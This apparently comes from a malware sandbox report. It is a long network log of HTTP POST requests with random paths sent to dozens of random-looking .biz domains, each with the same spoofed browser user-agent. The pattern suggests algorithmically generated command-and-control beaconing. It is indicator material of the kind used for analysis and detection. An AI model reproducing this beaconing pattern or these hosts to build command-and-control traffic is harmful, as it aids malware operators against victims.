                Source: global trafficHTTP traffic detected: POST /qa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xmoomdas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qmcamdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /akpcxuoptmorf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /armgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vdcxryneefpufnys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /sskdftgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /gbgqeacfgvpvmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jwmuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ppwjrkubwfxcghyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qppgqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rydwrcfdefifnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qeqkpadihkhxvp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wdbsliqsvat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /lmgofko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /agrlsditgvrhbmam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dckvav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qqngegncolupvk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /bioujqhkngbec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /eicbtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /lglryrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jjeefsoqcwkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xebufengtanjkobx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qsjvwblhtwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rewibl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /up HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gpwbguwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rcdfrlm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /iikfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wveptxshemmsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vdhidkscvohylymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dvvwndpvxviw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /idodhoekyfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ayk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qpwpqegnfgthpmmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dlmic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xfhqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qucjoqpnqvmyats HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qega HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vkbkkro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ymbuxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jihtwudooa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sgnslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mtec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ceqohx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jvioqipfomt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vgeign HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /woumhgcoto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /mhcgmys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /crmhxhtb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /evwtpcketpnsmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /anbxlwnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vfovcnyrge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /tnuhincspou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ynmucsrhqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /stobttwvpufmox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hoftnxoehn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kifvxdykbnmyfcxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
